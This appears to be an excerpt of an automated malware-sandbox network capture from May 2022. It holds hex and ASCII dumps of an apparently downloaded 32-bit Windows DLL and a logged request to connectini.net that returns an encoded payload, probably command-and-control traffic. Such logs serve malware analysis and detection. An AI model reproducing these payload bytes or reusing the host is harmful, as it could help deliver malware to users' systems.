                                                                                                                          2022-05-21 07:31:03 UTC586INData Raw: c4 0c 56 ff 75 e4 ff 75 dc ff 75 d8 6a 01 ff 75 08 ff d3 85 c0 74 7f 8b 5d cc 3b df 74 1d 57 57 ff 75 1c 53 56 ff 75 e4 57 ff 75 0c ff 15 84 80 00 10 85 c0 74 60 89 5d e0 eb 5b 39 7d d4 8b 1d 84 80 00 10 75 14 57 57 57 57 56 ff 75 e4 57 ff 75 0c ff d3 8b f0 3b f7 74 3c 56 6a 01 e8 5b b0 ff ff 3b c7 59 59 89 45 e0 74 2b 57 57 56 50 56 ff 75 e4 57 ff 75 0c ff d3 3b c7 75 0e ff 75 e0 e8 6a af ff ff 59 89 7d e0 eb 0b 83 7d dc ff 74 05 8b 4d d0 89 01 ff 75 e4 e8 73 ec ff ff 59 8b 45 e0 8d 65 c0 5f 5e 5b 8b 4d fc 33 cd e8 b6 a2 ff ff c9 c3 6a 0c 68 d8 94 00 10 e8 7c ba ff ff 83 65 fc 00 66 0f 28 c1 c7 45 e4 01 00 00 00 eb 23 8b 45 ec 8b 00 8b 00 3d 05 00 00 c0 74 0a 3d 1d 00 00 c0 74 03 33 c0 c3 33 c0 40 c3 8b 65 e8 83 65 e4 00 c7 45 fc fe ff ff ff 8b 45 e4 e8
                                                                                                                          Data Ascii: Vuuujut];tWWuSVuWut`][9}uWWWWVuWu;t<Vj[;YYEt+WWVPVuWu;uujY}}tMusYEe_^[M3jh|ef(E#E=t=t33@eeEE
                                                                                                                          2022-05-21 07:31:03 UTC588INData Raw: c0 8a 44 24 08 53 8b d8 c1 e0 08 8b 54 24 08 f7 c2 03 00 00 00 74 15 8a 0a 83 c2 01 3a cb 74 cf 84 c9 74 51 f7 c2 03 00 00 00 75 eb 0b d8 57 8b c3 c1 e3 10 56 0b d8 8b 0a bf ff fe fe 7e 8b c1 8b f7 33 cb 03 f0 03 f9 83 f1 ff 83 f0 ff 33 cf 33 c6 83 c2 04 81 e1 00 01 01 81 75 1c 25 00 01 01 81 74 d3 25 00 01 01 01 75 08 81 e6 00 00 00 80 75 c4 5e 5f 5b 33 c0 c3 8b 42 fc 3a c3 74 36 84 c0 74 ef 3a e3 74 27 84 e4 74 e7 c1 e8 10 3a c3 74 15 84 c0 74 dc 3a e3 74 06 84 e4 74 d4 eb 96 5e 5f 8d 42 ff 5b c3 8d 42 fe 5e 5f 5b c3 8d 42 fd 5e 5f 5b c3 8d 42 fc 5e 5f 5b c3 ff 25 d0 80 00 10 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec b8 01 00 00 00 5d c3 cc cc cc cc cc cc 55 8b ec b8 01 00 00 00 5d c3 cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 89 45 fc 83 7d fc 01 74 02
                                                                                                                          Data Ascii: D$ST$t:ttQuWV~333u%t%uu^_[3B:t6t:t't:tt:tt^_B[B^_[B^_[B^_[%U]U]UQEE}t
                                                                                                                          2022-05-21 07:31:03 UTC589INData Raw: c0 00 75 07 33 c0 e9 77 01 00 00 8d 45 a4 50 e8 a2 fd ff ff 83 c4 04 89 45 c4 83 7d c4 00 75 07 33 c0 e9 5b 01 00 00 8b 4d f4 81 c1 11 11 11 11 89 4d f4 8b 55 f0 81 c2 11 11 11 11 89 55 f0 8b 45 f8 05 11 11 11 11 89 45 f8 8d 4d f0 51 e8 63 fd ff ff 83 c4 04 89 45 cc 83 7d cc 00 75 07 33 c0 e9 1c 01 00 00 6a 00 68 80 00 00 00 6a 03 6a 00 6a 00 68 00 00 00 80 8b 55 10 52 ff 55 d0 89 45 d4 83 7d d4 ff 75 05 e9 e1 00 00 00 6a 00 8b 45 d4 50 ff 55 c0 89 45 ec c7 45 a0 00 00 00 00 83 7d ec 01 73 05 e9 c3 00 00 00 6a 00 8d 4d e4 51 6a 04 8d 55 c8 52 8b 45 d4 50 ff 55 c4 85 c0 74 3a 83 7d c8 00 74 2c 83 7d ec 00 74 26 8b 4d c8 3b 4d ec 76 1e c7 45 a0 01 00 00 00 8b 55 c8 81 ea ea d9 01 00 89 55 c8 8b 45 c8 2d 40 5d c6 00 89 45 c8 8b 4d c8 89 4d e8 eb 02 eb 70 8b
                                                                                                                          Data Ascii: u3wEPE}u3[MMUUEEMQcE}u3jhjjjhURUE}ujEPUEE}sjMQjUREPUt:}t,}t&M;MvEUUE-@]EMMp
                                                                                                                          2022-05-21 07:31:03 UTC590INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii:
                                                                                                                          2022-05-21 07:31:03 UTC592INData Raw: 70 6c 69 63 61 74 69 6f 6e 20 68 61 73 20 6d 61 64 65 20 61 6e 20 61 74 74 65 6d 70 74 20 74 6f 20 6c 6f 61 64 20 74 68 65 20 43 20 72 75 6e 74 69 6d 65 20 6c 69 62 72 61 72 79 20 69 6e 63 6f 72 72 65 63 74 6c 79 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 6c 69 63 61 74 69 6f 6e 27 73 20 73 75 70 70 6f 72 74 20 74 65 61 6d 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0d 0a 00 00 00 00 00 00 52 36 30 33 33 0d 0a 2d 20 41 74 74 65 6d 70 74 20 74 6f 20 75 73 65 20 4d 53 49 4c 20 63 6f 64 65 20 66 72 6f 6d 20 74 68 69 73 20 61 73 73 65 6d 62 6c 79 20 64 75 72 69 6e 67 20 6e 61 74 69 76 65 20 63 6f 64 65 20 69 6e 69 74 69 61 6c 69 7a 61 74 69 6f 6e 0a 54 68 69 73 20 69 6e 64 69 63 61 74 65 73 20 61 20 62 75 67
                                                                                                                          Data Ascii: plication has made an attempt to load the C runtime library incorrectly.Please contact the application's support team for more information.R6033- Attempt to use MSIL code from this assembly during native code initializationThis indicates a bug
                                                                                                                          2022-05-21 07:31:03 UTC592INData Raw: 34 32 61 31 0d 0a 63 74 69 6f 6e 20 66 72 6f 6d 20 61 20 6e 61 74 69 76 65 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 6f 72 20 66 72 6f 6d 20 44 6c 6c 4d 61 69 6e 2e 0d 0a 00 00 52 36 30 33 32 0d 0a 2d 20 6e 6f 74 20 65 6e 6f 75 67 68 20 73 70 61 63 65 20 66 6f 72 20 6c 6f 63 61 6c 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0d 0a 00 00 00 00 00 00 52 36 30 33 31 0d 0a 2d 20 41 74 74 65 6d 70 74 20 74 6f 20 69 6e 69 74 69 61 6c 69 7a 65 20 74 68 65 20 43 52 54 20 6d 6f 72 65 20 74 68 61 6e 20 6f 6e 63 65 2e 0a 54 68 69 73 20 69 6e 64 69 63 61 74 65 73 20 61 20 62 75 67 20 69 6e 20 79 6f 75 72 20 61 70 70 6c 69 63 61 74 69 6f 6e 2e 0d 0a 00 00 52 36 30 33 30 0d 0a 2d 20 43 52 54 20 6e 6f 74 20 69 6e 69 74 69 61 6c 69 7a 65 64 0d 0a 00 00 52 36 30 32 38 0d 0a 2d 20
                                                                                                                          Data Ascii: 42a1ction from a native constructor or from DllMain.R6032- not enough space for locale informationR6031- Attempt to initialize the CRT more than once.This indicates a bug in your application.R6030- CRT not initializedR6028-
                                                                                                                          2022-05-21 07:31:03 UTC593INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 28 00 28 00
                                                                                                                          Data Ascii: ((
                                                                                                                          2022-05-21 07:31:03 UTC595INData Raw: e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6
                                                                                                                          Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
                                                                                                                          2022-05-21 07:31:03 UTC596INData Raw: ff ff ff 00 00 00 00 d4 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 6c 30 00 10 00 00 00 00 fe ff ff ff 00 00 00 00 d8 ff ff ff 00 00 00 00 fe ff ff ff 68 31 00 10 7c 31 00 10 00 00 00 00 fe ff ff ff 00 00 00 00 d8 ff ff ff 00 00 00 00 fe ff ff ff ae 31 00 10 b2 31 00 10 00 00 00 00 fe ff ff ff 00 00 00 00 c0 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 a0 33 00 10 00 00 00 00 fe ff ff ff 00 00 00 00 cc ff ff ff 00 00 00 00 fe ff ff ff 96 34 00 10 ad 34 00 10 00 00 00 00 fe ff ff ff 00 00 00 00 d4 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 fb 37 00 10 00 00 00 00 fe ff ff ff 00 00 00 00 d4 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 ad 3a 00 10 00 00 00 00 fe ff ff ff 00 00 00 00 cc ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 c1 3e 00 10 00 00 00 00
                                                                                                                          Data Ascii: l0h1|1113447:>
                                                                                                                          2022-05-21 07:31:03 UTC597INData Raw: 48 65 61 70 44 65 73 74 72 6f 79 00 12 02 48 65 61 70 43 72 65 61 74 65 00 00 83 03 56 69 72 74 75 61 6c 46 72 65 65 00 a3 02 51 75 65 72 79 50 65 72 66 6f 72 6d 61 6e 63 65 43 6f 75 6e 74 65 72 00 df 01 47 65 74 54 69 63 6b 43 6f 75 6e 74 00 00 43 01 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 49 64 00 ca 01 47 65 74 53 79 73 74 65 6d 54 69 6d 65 41 73 46 69 6c 65 54 69 6d 65 00 a4 03 57 72 69 74 65 46 69 6c 65 00 51 02 4c 65 61 76 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 00 00 98 00 45 6e 74 65 72 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 00 00 52 02 4c 6f 61 64 4c 69 62 72 61 72 79 41 00 00 23 02 49 6e 69 74 69 61 6c 69 7a 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 00 04 01 47 65 74 43 50 49 6e 66 6f 00 fd 00 47 65 74 41 43 50 00
                                                                                                                          Data Ascii: HeapDestroyHeapCreateVirtualFreeQueryPerformanceCounterGetTickCountCGetCurrentProcessIdGetSystemTimeAsFileTimeWriteFileQLeaveCriticalSectionEnterCriticalSectionRLoadLibraryA#InitializeCriticalSectionGetCPInfoGetACP
                                                                                                                          2022-05-21 07:31:03 UTC599INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii:
                                                                                                                          2022-05-21 07:31:03 UTC600INData Raw: 16 00 00 00 59 00 00 00 0b 00 00 00 6c 00 00 00 0d 00 00 00 6d 00 00 00 20 00 00 00 70 00 00 00 1c 00 00 00 72 00 00 00 09 00 00 00 06 00 00 00 16 00 00 00 80 00 00 00 0a 00 00 00 81 00 00 00 0a 00 00 00 82 00 00 00 09 00 00 00 83 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 91 00 00 00 29 00 00 00 9e 00 00 00 0d 00 00 00 a1 00 00 00 02 00 00 00 a4 00 00 00 0b 00 00 00 a7 00 00 00 0d 00 00 00 b7 00 00 00 11 00 00 00 ce 00 00 00 02 00 00 00 d7 00 00 00 0b 00 00 00 18 07 00 00 0c 00 00 00 0c 00 00 00 08 00 00 00 ad 58 00 10 ad 58 00 10 ad 58 00 10 ad 58 00 10 ad 58 00 10 ad 58 00 10 ad 58 00 10 ad 58 00 10 ad 58 00 10 ad 58 00 10 94 8b 00 10 00 00 00 00 43 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: Ylm pr)XXXXXXXXXXC
                                                                                                                          2022-05-21 07:31:03 UTC601INData Raw: 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 a5 00 10 01 02 04 08 a4 03 00 00 60 82 79 82 21 00 00 00 00 00 00 00 a6 df 00 00 00 00 00 00 a1 a5 00 00 00 00 00 00 81 9f e0 fc 00 00 00 00 40 7e 80 fc 00 00 00 00 a8 03 00 00 c1 a3 da a3 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 81 fe 00 00 00 00 00 00 40 fe 00 00
                                                                                                                          Data Ascii: EFGHIJKLMNOPQRSTUVWXYZ0`y!@~ @
                                                                                                                          2022-05-21 07:31:03 UTC603INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii:
                                                                                                                          2022-05-21 07:31:03 UTC604INData Raw: 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49
                                                                                                                          Data Ascii: GPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDI
                                                                                                                          2022-05-21 07:31:03 UTC605INData Raw: 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47
                                                                                                                          Data Ascii: XPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDING
                                                                                                                          2022-05-21 07:31:03 UTC607INData Raw: 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47
                                                                                                                          Data Ascii: ADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
                                                                                                                          2022-05-21 07:31:03 UTC608INData Raw: 2c 3e 34 3e 4b 3e 64 3e 80 3e 89 3e 8f 3e 98 3e 9d 3e ac 3e d3 3e fc 3e 0d 3f 21 3f 27 3f 2e 3f 3b 3f 42 3f 48 3f 50 3f 56 3f 62 3f 67 3f 00 40 00 00 9c 00 00 00 a8 31 b6 31 bc 31 d6 31 db 31 ea 31 f3 31 00 32 0b 32 1d 32 30 32 3b 32 41 32 47 32 4c 32 55 32 72 32 78 32 83 32 88 32 90 32 96 32 a0 32 a7 32 bb 32 c2 32 c8 32 d6 32 dd 32 e2 32 eb 32 f8 32 fe 32 18 33 29 33 2f 33 40 33 a3 33 3b 37 47 37 7a 37 a0 37 da 37 1f 38 f2 39 fd 39 05 3a 1a 3a 2c 3a 77 3a 81 3a a2 3a da 3a e8 3a 2c 3b 88 3b 9d 3b e3 3b e9 3b f5 3b 4a 3c 7d 3c b5 3c 20 3d 26 3d 77 3d 7d 3d a1 3d c4 3d f8 3d fe 3d 0a 3e 51 3e ea 3f 00 50 00 00 e8 00 00 00 1f 30 38 30 3f 30 47 30 4c 30 50 30 54 30 7d 30 a3 30 c1 30 c8 30 cc 30 d0 30 d4 30 d8 30 dc 30 e0 30 e4 30 2e 31 34 31 38 31 3c 31 40
                                                                                                                          Data Ascii: ,>4>K>d>>>>>>>>>?!?'?.?;?B?H?P?V?b?g?@111111122202;2A2G2L2U2r2x22222222222222223)3/3@33;7G7z777899::,:w:::::,;;;;;;J<}<< =&=w=}=====>Q>?P080?0G0L0P0T0}00000000000.14181<1@
                                                                                                                          2022-05-21 07:31:03 UTC609INData Raw: 61 30 62 0d 0a 39 00 00 00 80 00 00 14 00 00 00 00 31 04 31 08 31 0c 31 2c 31 30 31 00 90 00 00 44 00 00 00 44 32 48 32 84 32 88 32 a8 32 c8 32 e8 32 f4 32 10 33 2c 33 30 33 50 33 70 33 8c 33 90 33 ac 33 b0 33 d0 33 ec 33 f0 33 10 34 30 34 50 34 70 34 90 34 b0 34 d0 34 ec 34 f0 34 00 00 00 a0 00 00 e0 00 00 00 08 30 cc 30 d4 30 dc 30 e4 30 ec 30 f4 30 fc 30 04 31 0c 31 14 31 1c 31 24 31 2c 31 34 31 3c 31 44 31 4c 31 54 31 5c 31 64 31 6c 31 74 31 7c 31 10 34 14 34 18 34 1c 34 20 34 24 34 28 34 2c 34 30 34 34 34 38 34 a0 34 b0 34 c0 34 d0 34 e0 34 04 35 10 35 14 35 18 35 1c 35 20 35 28 35 2c 35 58 39 54 3a 58 3a 60 3a 64 3a 68 3a 6c 3a 70 3a 74 3a 78 3a 7c 3a 80 3a 84 3a 88 3a 8c 3a 90 3a 94 3a 98 3a 9c 3a a0 3a a4 3a a8 3a ac 3a b0 3a b4 3a b8 3a bc 3a c0
                                                                                                                          Data Ascii: a0b91111,101DD2H22222223,303P3p33333333404P4p444444000000001111$1,141<1D1L1T1\1d1l1t1|14444 4$4(4,40444844444455555 5(5,5X9T:X:`:d:h:l:p:t:x:|:::::::::::::::::
                                                                                                                          2022-05-21 07:31:03 UTC610INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii:
                                                                                                                          2022-05-21 07:31:03 UTC611INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          10192.168.2.44981337.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:32:43 UTC1546OUTGET /Series/kenpachi/2/goodchannel/CH.json HTTP/1.1
                                                                                                                          Host: connectini.net
                                                                                                                          2022-05-21 07:32:43 UTC1546INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Sat, 21 May 2022 07:32:43 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Content-Length: 10072
                                                                                                                          Last-Modified: Sat, 21 May 2022 07:15:02 GMT
                                                                                                                          Connection: close
                                                                                                                          ETag: "62889176-2758"
                                                                                                                          X-Powered-By: PleskLin
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2022-05-21 07:32:43 UTC1546INData Raw: 33 4d 58 31 48 48 39 62 52 73 30 4d 39 4e 58 4c 4a 6e 4b 30 54 47 59 69 4b 78 45 31 6c 4d 36 59 2b 64 46 4e 63 42 6d 58 54 65 69 44 41 78 39 58 63 64 46 37 73 46 30 73 6c 6a 6a 65 56 75 71 77 34 53 52 78 2f 70 79 42 39 4b 4c 44 66 5a 6a 69 6e 51 76 39 4e 52 79 4d 32 4b 42 2b 53 43 59 71 4e 75 70 75 30 4d 76 6b 6d 47 52 6d 55 57 50 57 62 64 6f 39 68 4e 48 33 47 69 78 58 2b 51 4d 54 62 4d 75 58 59 77 61 32 38 54 37 42 2f 53 32 4d 31 77 70 51 68 78 53 49 63 71 66 45 6a 74 57 64 2f 6c 53 4d 6d 43 2f 4c 78 65 41 4f 64 69 44 6f 55 77 76 77 48 73 38 72 36 59 50 72 62 64 44 6f 31 69 52 61 44 36 42 6f 69 35 49 78 5a 6c 38 69 4d 72 79 51 79 71 37 6f 50 53 38 68 51 76 67 61 47 31 6d 62 48 69 63 6a 43 73 37 67 55 31 31 4b 69 47 78 66 63 78 33 34 47 49 44 6f 42 6c 78
                                                                                                                          Data Ascii: 3MX1HH9bRs0M9NXLJnK0TGYiKxE1lM6Y+dFNcBmXTeiDAx9XcdF7sF0sljjeVuqw4SRx/pyB9KLDfZjinQv9NRyM2KB+SCYqNupu0MvkmGRmUWPWbdo9hNH3GixX+QMTbMuXYwa28T7B/S2M1wpQhxSIcqfEjtWd/lSMmC/LxeAOdiDoUwvwHs8r6YPrbdDo1iRaD6Boi5IxZl8iMryQyq7oPS8hQvgaG1mbHicjCs7gU11KiGxfcx34GIDoBlx


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          11192.168.2.449812151.115.10.1443
                                                                                                                          TimestampkBytes transferredDirectionData
